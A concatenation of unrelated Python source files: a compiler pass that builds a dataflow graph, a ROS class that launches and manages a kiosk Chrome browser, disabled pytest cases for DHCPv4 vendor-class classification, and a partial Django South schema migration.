return self.dataflow.null
else:
field = graph.FieldNode(self.hyperblock, slot)
self.dataflow.entry.addEntry(slot, field)
return field
def set(self, slot, value):
self.slots[slot] = value
self.dataflow.entry.addEntry(slot, value)
class CodeToDataflow(TypeDispatcher):
def __init__(self, code):
self.uid = 0
hyperblock = self.newHyperblock()
self.code = code
self.dataflow = graph.DataflowGraph(hyperblock)
self.dataflow.initPredicate()
self.entryState = DeferedEntryPoint(hyperblock, self.dataflow.entryPredicate, self.code, self.dataflow)
self.current = State(hyperblock, self.dataflow.entryPredicate, self.entryState)
self.returns = []
self.allModified = set()
def newHyperblock(self):
name = self.uid
self.uid += 1
return graph.Hyperblock(name)
def branch(self, predicates):
current = self.popState()
branches = current.split(predicates)
return branches
def setState(self, state):
assert self.current is None
self.current = state
def popState(self):
old = self.current
self.current = None
return old
def mergeStates(self, states):
# TODO predicated merge / mux?
states = [state for state in states if state is not None]
if len(states) == 1:
# TODO is this sound? Does it interfere with hyperblock definition?
state = states.pop()
else:
# TODO only create a new hyperblock when merging from different hyperblocks?
hyperblock = self.newHyperblock()
pairs = [(state.predicate, state.predicate) for state in states]
predicate = gatedMerge(hyperblock, pairs)
predicate.name = repr(hyperblock)
state = DeferedMerge(hyperblock, predicate, states)
state = State(hyperblock, predicate, state)
self.setState(state)
return state
def get(self, slot):
return self.current.get(slot)
def set(self, slot, value):
value.addName(slot)
self.allModified.add(slot)
return self.current.set(slot, value)
def pred(self):
return self.current.predicate
def hyperblock(self):
return self.current.hyperblock
def localTarget(self, lcl):
if isinstance(lcl, ast.Local):
node = graph.LocalNode(self.hyperblock(), (lcl,))
else:
assert False
return node
def handleOp(self, node, targets):
g = self(node)
assert isinstance(g, graph.GenericOp), (node, g)
for lcl in targets:
target = self.localTarget(lcl)
self.set(lcl, target)
g.addLocalModify(lcl, target)
def handleMemory(self, node, g):
# Reads
for read in node.annotation.reads.merged:
slot = self.get(read)
g.addRead(read, slot)
# Psedo reads
for modify in node.annotation.modifies.merged:
slot = self.get(modify)
g.addPsedoRead(modify, slot)
# Modifies
for modify in node.annotation.modifies.merged:
slot = graph.FieldNode(self.hyperblock(), modify)
self.set(modify, slot)
g.addModify(modify, slot)
def localRead(self, g, lcl):
if isinstance(lcl, (ast.Local, ast.Existing)):
g.addLocalRead(lcl, self.get(lcl))
@dispatch(ast.Allocate)
def processAllocate(self, node):
g = graph.GenericOp(self.hyperblock(), node)
g.setPredicate(self.pred())
self.localRead(g, node.expr)
self.handleMemory(node, g)
return g
@dispatch(ast.Load)
def processLoad(self, node):
g = graph.GenericOp(self.hyperblock(), node)
g.setPredicate(self.pred())
self.localRead(g, node.expr)
self.localRead(g, node.name)
self.handleMemory(node, g)
return g
@dispatch(ast.DirectCall)
def processDirectCall(self, node):
g = graph.GenericOp(self.hyperblock(), node)
g.setPredicate(self.pred())
self.localRead(g, node.selfarg)
for arg in node.args:
self.localRead(g, arg)
self.localRead(g, node.vargs)
self.localRead(g, node.kargs)
self.handleMemory(node, g)
return g
@dispatch(ast.Local, ast.Existing)
def visitLocalRead(self, node):
return self.get(node)
@dispatch(ast.Assign)
def processAssign(self, node):
if isinstance(node.expr, (ast.Local, ast.Existing)) and len(node.lcls) == 1:
# Local copy
target = node.lcls[0]
g = self.get(node.expr)
self.set(target, g)
else:
self.handleOp(node.expr, node.lcls)
@dispatch(ast.Discard)
def processDiscard(self, node):
self.handleOp(node.expr, [])
@dispatch(ast.Store)
def processStore(self, node):
g = graph.GenericOp(self.hyperblock(), node)
g.setPredicate(self.pred())
self.localRead(g, node.expr)
self.localRead(g, node.name)
self.localRead(g, node.value)
self.handleMemory(node, g)
return g
@dispatch(ast.Return)
def processReturn(self, node):
for dst, src in zip(self.code.codeparameters.returnparams, node.exprs):
self.set(dst, self.get(src))
self.returns.append(self.popState())
@dispatch(ast.TypeSwitch)
def processTypeSwitch(self, node):
g = graph.GenericOp(self.hyperblock(), node)
g.setPredicate(self.pred())
self.localRead(g, node.conditional)
for i in range(len(node.cases)):
p = graph.PredicateNode(self.hyperblock(), i)
g.predicates.append(p.addDefn(g))
branches = self.branch(g.predicates)
exits = []
for case, branch in zip(node.cases, branches):
self.setState(branch)
if case.expr:
target = self.localTarget(case.expr)
self.set(case.expr, target)
else:
target = None
g.addLocalModify(case.expr, target)
self(case.body)
exits.append(self.popState())
self.mergeStates(exits)
@dispatch(str, type(None), ast.Code)
def processLeaf(self, node):
return None
@dispatch(ast.Suite)
def processOK(self, node):
node.visitChildren(self)
def handleExit(self):
state = self.mergeStates(self.returns)
killed = self.code.annotation.killed.merged
self.dataflow.exit = graph.Exit(state.hyperblock)
self.dataflow.exit.setPredicate(state.predicate)
for name in self.allModified:
if isinstance(name, ast.Local):
if name in self.code.codeparameters.returnparams:
self.dataflow.exit.addExit(name, state.get(name))
elif isinstance(name, storegraph.SlotNode):
if name.object not in killed:
self.dataflow.exit.addExit(name, state.get(name))
def setParameter(self, param):
if isinstance(param, ast.Local):
g = self.localTarget(param)
self.entryState.set(param, g)
def processCode(self):
# Init the parameters
params = self.code.codeparameters
self.setParameter(params.selfparam)
for p in (params.params):
self.setParameter(p)
assert not hasattr(params, 'kwds')
self.setParameter(params.vparam)
self.setParameter(params.kparam)
self(self.code.ast)
self.handleExit()
return self.dataflow
def evaluateCode(compiler, code):
ctd = CodeToDataflow(code)
dataflow = ctd.processCode()
dce.evaluateDataflow(dataflow)
return dataflow
| |
import sys
import rospy
import socket
import shutil
import os
import requests
import threading
from lg_common import ManagedApplication, ManagedWindow
from lg_common.tcp_relay import TCPRelay
from lg_msg_defs.msg import ApplicationState
from tornado.websocket import websocket_connect
DEFAULT_BINARY = '/usr/bin/google-chrome'
DEFAULT_ARGS = [
'--enable-gpu-rasterization',
'--no-first-run',
'--no-sandbox',
'--test-type', # only needed to ignore --no-sandbox's warning message
'--allow-file-access-from-files',
'--disable-default-apps',
'--disable-java',
'--disable-session-storage',
'--disable-translate',
'--touch-events=enabled',
'--disable-pinch',
'--overscroll-history-navigation=0',
'--allow-running-insecure-content',
'--disable-touch-editing',
'--v=1',
'--enable-webgl',
'--ignore-gpu-blacklist',
'--touch-events=enabled',
'--disable-pinch',
'--overscroll-history-navigation=0',
'--autoplay-policy=no-user-gesture-required',
'--check-for-update-interval=1209600',
]
def set_interval(func, sec):
def func_wrapper():
set_interval(func, sec)
func()
t = threading.Timer(sec, func_wrapper)
t.start()
return t
class ManagedBrowser(ManagedApplication):
def __init__(
self,
url=None,
slug=None,
kiosk=True,
user_data_dir=None,
geometry=None,
binary=DEFAULT_BINARY,
remote_debugging_port=None,
app=False,
reload_aw_snap=False,
shell=True,
command_line_args=[],
default_args_removal=[],
disk_cache_size=314572800,
log_level=0,
extensions=[],
log_stderr=False,
user_agent='',
pepper_flash_dir='/home/lg/inc/PepperFlash',
pnacl_dir='/home/lg/inc/pnacl',
layer=ManagedWindow.LAYER_NORMAL,
**kwargs
):
# If no slug provided, attempt to use the node name.
if slug is None:
try:
slug = rospy.get_name().lstrip('/')
except Exception as e:
sys.stderr.write('Could not resolve slug for this browser!')
sys.stderr.write(' * Has your node been initialized?')
raise e
cmd = [binary]
if user_agent:
cmd.append('--user-agent={}'.format(user_agent))
# If no debug port provided, pick one.
if remote_debugging_port is None:
remote_debugging_port = ManagedBrowser.get_os_port()
self.debug_port = ManagedBrowser.get_os_port()
self.relay = TCPRelay(self.debug_port, remote_debugging_port)
if log_stderr:
cmd.append('--enable-logging=stderr')
else:
cmd.append('--enable-logging')
cmd.append('--remote-debugging-port={}'.format(self.debug_port))
cmd.append('--log-level={}'.format(log_level))
self.user_data_dir = user_data_dir
if self.user_data_dir:
rospy.logdebug('using data dir {}'.format(self.user_data_dir))
self.tmp_dir = '/tmp/user_data_dirs/{}'.format(self.user_data_dir)
else:
self.tmp_dir = '/tmp/lg_browser_{}'.format(slug)
rospy.logdebug('clearing tmp dir {}'.format(self.tmp_dir))
self.clear_tmp_dir()
self.pepper_flash_dir = pepper_flash_dir
self.pnacl_dir = pnacl_dir
self.init_tmp_dir()
cmd.append('--user-data-dir={}'.format(self.tmp_dir))
cmd.append('--disk-cache-dir={}'.format(self.tmp_dir))
cmd.append('--crash-dumps-dir={}/crashes'.format(self.tmp_dir))
if extensions:
for extension in extensions:
if not os.path.isdir(extension):
extensions.remove(extension)
rospy.logwarn("Could not load extension from %s because dir does not exist" % extension)
if extensions:
cmd.append('--load-extension={}'.format(','.join(extensions)))
for _cmd in default_args_removal:
if _cmd in DEFAULT_ARGS:
DEFAULT_ARGS.remove(_cmd)
cmd.extend(DEFAULT_ARGS)
if command_line_args != []:
cmd.extend(command_line_args)
# All remaining kwargs are mapped to command line args.
# _ is replaced with -.
def consume_kwarg(item):
key, value = item
arg = '--{}'.format(key.replace('_', '-'))
if value is None:
return arg
if isinstance(value, bool):
arg += '=' + str(value).lower()
else:
arg += '=' + str(value)
return arg
args = list(map(consume_kwarg, iter(kwargs.items())))
cmd.extend(args)
if app:
cmd.append('--app={}'.format(url))
else:
if kiosk:
cmd.append('--kiosk')
pass
if url is not None:
cmd.append(url)
# finishing command line and piping output to logger
rospy.logdebug("Starting cmd: %s" % cmd)
# Different versions of Chrome use different window instance names.
# Matching the tmp_dir should work for all of them.
w_instance = 'google-chrome ({})'.format(self.tmp_dir)
window = ManagedWindow(
w_instance=w_instance,
geometry=geometry,
chrome_kiosk_workaround=kiosk,
layer=layer,
)
rospy.logdebug("Command {}".format(cmd))
if (reload_aw_snap):
self.set_aw_snap_timer()
# clean up after thyself
rospy.on_shutdown(self.clear_tmp_dir)
super(ManagedBrowser, self).__init__(cmd=cmd, window=window)
def post_init(self):
super(ManagedBrowser, self).post_init()
if not self.user_data_dir:
self.add_respawn_handler(self.clear_tmp_dir)
self.add_respawn_handler(self.init_tmp_dir)
self.add_state_handler(self.control_relay)
def init_tmp_dir(self):
"""
Creates the tmp dir
then links in the path to Chrome components like PepperFlash
then replaces the path in the latest-copmponent-updated-flash file
"""
if os.path.exists(self.tmp_dir):
if self.user_data_dir:
return # this is fine
else:
rospy.logerr("Temp dir exists for chrome already")
try:
os.mkdir(self.tmp_dir)
os.mkdir(self.tmp_dir + '/PepperFlash')
except Exception:
rospy.logerr("Error trying to make the tmp dir, could exist already")
# Link NaCl component. https://github.com/EndPointCorp/lg_ros_nodes/issues/357
try:
os.symlink(self.pnacl_dir, os.path.join(self.tmp_dir, 'pnacl'))
rospy.loginfo("Linked `pnacl` directory %s" % self.pnacl_dir)
except Exception as e:
rospy.logerr("Error linking pNaCl, %s" % e)
try:
os.symlink(self.pepper_flash_dir + '/flash_dir', "%s/PepperFlash/flash_dir" % self.tmp_dir)
with open("%s/latest-component-updated-flash" % self.pepper_flash_dir, "r") as f:
out = f.read()
with open("%s/PepperFlash/latest-component-updated-flash" % self.tmp_dir, "w") as f:
f.write(out.replace("${TMP_DIR}", self.tmp_dir))
except Exception as e:
rospy.logerr("Error copying pepper flash into the tmp dir, %s" % e)
def clear_tmp_dir(self):
"""
Clears out all temporary files and disk cache for this instance.
"""
if self.user_data_dir:
rospy.logerr('not clearing, because user data dir')
return
try:
rospy.logerr("Purging ManagedBrowser directory: %s" % self.tmp_dir)
shutil.rmtree(self.tmp_dir)
except OSError as e:
rospy.logdebug("Could not purge the %s directory because %s" % (self.tmp_dir, e))
@staticmethod
def get_os_port():
"""
Lets the OS assign a port number.
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('', 0))
port = sock.getsockname()[1]
sock.close()
return port
def list_pages_available_for_debug(self):
debug_url = 'http://localhost:{}/json/list'.format(self.debug_port)
return requests.get(debug_url).json()
def set_aw_snap_timer(self):
self.aw_snap_interval = set_interval(self.check_alive_and_reload, 1)
def check_alive_and_reload(self):
if not self.check_alive():
rospy.logerr("Browser is probably dead")
self.reload_page()
def reload_page(self):
pid = self.proc.get_pid()
if pid:
cmd = "DISPLAY=:0 xdotool search --onlyvisible --all --pid {} --class Chrome windowfocus key F5".format(pid)
os.system(cmd)
def check_alive(self):
return len(self.list_pages_available_for_debug()) > 0
def send_debug_sock_msg(self, msg):
"""
Writes a string to the browser's debug web socket.
"""
rospy.warn(
'ManagedBrowser.send_debug_sock_msg() probably not yet working'
)
ws_url = 'ws://localhost:{}'.format(self.debug_port)
conn = yield websocket_connect(ws_url, connect_timeout=1)
conn.write_message(msg)
conn.close()
def control_relay(self, state):
if state == ApplicationState.STOPPED:
self.relay.stop()
elif state == ApplicationState.SUSPENDED:
self.relay.start()
elif state == ApplicationState.HIDDEN:
self.relay.start()
elif state == ApplicationState.VISIBLE:
self.relay.start()
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
| |
"""DHCPv4 Client Classification - default classes"""
# pylint: disable=invalid-name,line-too-long
import pytest
import srv_control
import misc
import srv_msg
@pytest.mark.v4
@pytest.mark.classification
@pytest.mark.default_classes
@pytest.mark.disabled
def test_v4_client_classification_one_class_docsis3_boot_file_name():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.1-192.168.50.1')
srv_control.config_client_classification(0, 'VENDOR_CLASS_docsis3.0')
srv_control.config_srv_another_subnet_no_interface('192.168.50.0/24',
'192.168.50.100-192.168.50.100')
srv_control.config_srv('boot-file-name', 0, 'somefilename')
srv_control.config_srv_opt('boot-file-name', 'someotherfilename')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
srv_msg.client_does_include_with_value('client_id', '00010203040506')
srv_msg.client_does_include_with_value('vendor_class_id', 'docsis3.0')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_content('file', 'somefilename')
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_content('file', 'someotherfilename', expected=False)
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(54)
srv_msg.response_check_include_option(61)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.response_check_option_content(54, 'value', '$(SRV4_ADDR)')
srv_msg.response_check_option_content(61, 'value', '00010203040506')
@pytest.mark.v4
@pytest.mark.classification
@pytest.mark.default_classes
@pytest.mark.disabled
def test_v4_client_classification_one_class_docsis3_next_server():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.1-192.168.50.1')
srv_control.config_client_classification(0, 'VENDOR_CLASS_docsis3.0')
srv_control.config_srv_another_subnet_no_interface('192.168.50.0/24',
'192.168.50.100-192.168.50.100')
srv_control.config_srv('boot-file-name', 0, 'somefilename')
srv_control.subnet_add_siaddr(0, '192.0.2.234')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
srv_msg.client_does_include_with_value('client_id', '00010203040506')
srv_msg.client_does_include_with_value('vendor_class_id', 'docsis3.0')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_content('file', 'somefilename')
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_content('siaddr', '192.0.2.234')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(54)
srv_msg.response_check_include_option(61)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.response_check_option_content(54, 'value', '$(SRV4_ADDR)')
srv_msg.response_check_option_content(61, 'value', '00010203040506')
@pytest.mark.v4
@pytest.mark.classification
@pytest.mark.default_classes
@pytest.mark.disabled
def test_v4_client_classification_one_class_eRouter1_global_next_server():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.1-192.168.50.1')
srv_control.config_client_classification(0, 'VENDOR_CLASS_eRouter1.0')
srv_control.config_srv_another_subnet_no_interface('192.168.50.0/24',
'192.168.50.100-192.168.50.100')
srv_control.config_srv('boot-file-name', 0, 'somefilename')
srv_control.global_add_siaddr('192.0.2.2')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
srv_msg.client_does_include_with_value('client_id', '00010203040506')
srv_msg.client_does_include_with_value('vendor_class_id', 'eRouter1.0')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_content('file', 'somefilename', expected=False)
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_content('siaddr', '0.0.0.0')
srv_msg.response_check_content('siaddr', '192.0.2.2', expected=False)
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(54)
srv_msg.response_check_include_option(61)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.response_check_option_content(54, 'value', '$(SRV4_ADDR)')
srv_msg.response_check_option_content(61, 'value', '00010203040506')
@pytest.mark.v4
@pytest.mark.classification
@pytest.mark.default_classes
@pytest.mark.disabled
def test_v4_client_classification_one_class_eRouter1_subnet_next_server():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.1-192.168.50.1')
srv_control.config_client_classification(0, 'VENDOR_CLASS_eRouter1.0')
srv_control.config_srv_another_subnet_no_interface('192.168.50.0/24',
'192.168.50.100-192.168.50.100')
srv_control.config_srv('boot-file-name', 0, 'somefilename')
srv_control.subnet_add_siaddr(0, '192.0.2.234')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
srv_msg.client_does_include_with_value('client_id', '00010203040506')
srv_msg.client_does_include_with_value('vendor_class_id', 'eRouter1.0')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_content('file', 'somefilename', expected=False)
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_content('siaddr', '0.0.0.0')
srv_msg.response_check_content('siaddr', '192.0.2.234', expected=False)
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(54)
srv_msg.response_check_include_option(61)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.response_check_option_content(54, 'value', '$(SRV4_ADDR)')
srv_msg.response_check_option_content(61, 'value', '00010203040506')
@pytest.mark.v4
@pytest.mark.classification
@pytest.mark.default_classes
@pytest.mark.disabled
def test_v4_client_classification_one_class_eRouter1_two_next_servers():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.1-192.168.50.1')
srv_control.config_client_classification(0, 'VENDOR_CLASS_eRouter1.0')
srv_control.config_srv_another_subnet_no_interface('192.168.50.0/24',
'192.168.50.100-192.168.50.100')
srv_control.config_srv('boot-file-name', 0, 'somefilename')
srv_control.global_add_siaddr('192.0.2.2')
srv_control.subnet_add_siaddr(0, '192.0.2.234')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
srv_msg.client_does_include_with_value('client_id', '00010203040506')
srv_msg.client_does_include_with_value('vendor_class_id', 'eRouter1.0')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_content('file', 'somefilename', expected=False)
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_content('siaddr', '0.0.0.0')
srv_msg.response_check_content('siaddr', '192.0.2.234', expected=False)
srv_msg.response_check_content('siaddr', '192.0.2.2', expected=False)
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(54)
srv_msg.response_check_include_option(61)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.response_check_option_content(54, 'value', '$(SRV4_ADDR)')
srv_msg.response_check_option_content(61, 'value', '00010203040506')
@pytest.mark.v4
@pytest.mark.classification
@pytest.mark.default_classes
@pytest.mark.disabled
def test_v4_client_classification_multiple_classes_three_subnets_docsis_erouter():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.1-192.168.50.1')
srv_control.config_client_classification(0, 'VENDOR_CLASS_eRouter1.0')
srv_control.subnet_add_siaddr(0, '192.0.50.1')
srv_control.config_srv('boot-file-name', 0, 'filename')
srv_control.config_srv_another_subnet_no_interface('192.168.50.0/24',
'192.168.50.50-192.168.50.50')
srv_control.config_client_classification(1, 'VENDOR_CLASS_docsis3.0')
srv_control.subnet_add_siaddr(1, '192.0.50.50')
srv_control.config_srv('boot-file-name', 1, 'somefilename')
srv_control.config_srv_another_subnet_no_interface('192.168.50.0/24',
'192.168.50.100-192.168.50.100')
srv_control.global_add_siaddr('192.0.50.100')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
srv_msg.client_does_include_with_value('client_id', '00010203040506')
srv_msg.client_does_include_with_value('vendor_class_id', 'eRouter1.0')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_content('siaddr', '192.0.50.1', expected=False)
srv_msg.response_check_content('siaddr', '192.0.50.50', expected=False)
srv_msg.response_check_content('siaddr', '192.0.50.100', expected=False)
srv_msg.response_check_content('file', 'somefilename', expected=False)
srv_msg.response_check_content('file', 'filename', expected=False)
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_content('siaddr', '0.0.0.0')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
srv_msg.client_does_include_with_value('client_id', '00010203040506')
srv_msg.client_does_include_with_value('vendor_class_id', 'docsis3.0')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_content('siaddr', '192.0.50.1', expected=False)
srv_msg.response_check_content('siaddr', '192.0.50.100', expected=False)
srv_msg.response_check_content('siaddr', '0.0.0.0', expected=False)
srv_msg.response_check_content('file', 'filename', expected=False)
srv_msg.response_check_content('siaddr', '192.0.50.50')
srv_msg.response_check_content('file', 'somefilename')
srv_msg.response_check_content('yiaddr', '192.168.50.50')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(54)
srv_msg.response_check_include_option(61)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.response_check_option_content(54, 'value', '$(SRV4_ADDR)')
srv_msg.response_check_option_content(61, 'value', '00010203040506')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
srv_msg.client_does_include_with_value('client_id', '00010203040506')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_content('siaddr', '192.0.50.1', expected=False)
srv_msg.response_check_content('siaddr', '192.0.50.50', expected=False)
srv_msg.response_check_content('siaddr', '0.0.0.0', expected=False)
srv_msg.response_check_content('file', 'filename', expected=False)
srv_msg.response_check_content('file', 'somefilename', expected=False)
srv_msg.response_check_content('yiaddr', '192.168.50.100')
srv_msg.response_check_content('siaddr', '192.0.50.100')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(54)
srv_msg.response_check_include_option(61)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.response_check_option_content(54, 'value', '$(SRV4_ADDR)')
srv_msg.response_check_option_content(61, 'value', '00010203040506')
| |
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'UserInteraction.makey'
db.add_column(u'catalog_userinteraction', 'makey',
self.gf('django.db.models.fields.related.ForeignKey')(related_name='interactions', null=True, to=orm['catalog.Makey']),
keep_default=False)
def backwards(self, orm):
# Deleting field 'UserInteraction.makey'
db.delete_column(u'catalog_userinteraction', 'makey_id')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'catalog.answer': {
'Meta': {'ordering': "['-created']", 'object_name': 'Answer'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'description': ('tinymce.models.HTMLField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Question']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'catalog.article': {
'Meta': {'object_name': 'Article'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'added_time_staff_pick': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'comments': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['catalog.Comment']", 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff_pick': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'new_user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.NewUser']", 'null': 'True', 'blank': 'True'}),
'rating': ('django.db.models.fields.IntegerField', [], {}),
'recommendation': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['catalog.ArticleTag']", 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'catalog.articleemail': {
'Meta': {'object_name': 'ArticleEmail'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'email_subscriptions'", 'null': 'True', 'to': "orm['catalog.ArticleTag']"}),
'temp_id': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'catalog.articletag': {
'Meta': {'object_name': 'ArticleTag'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
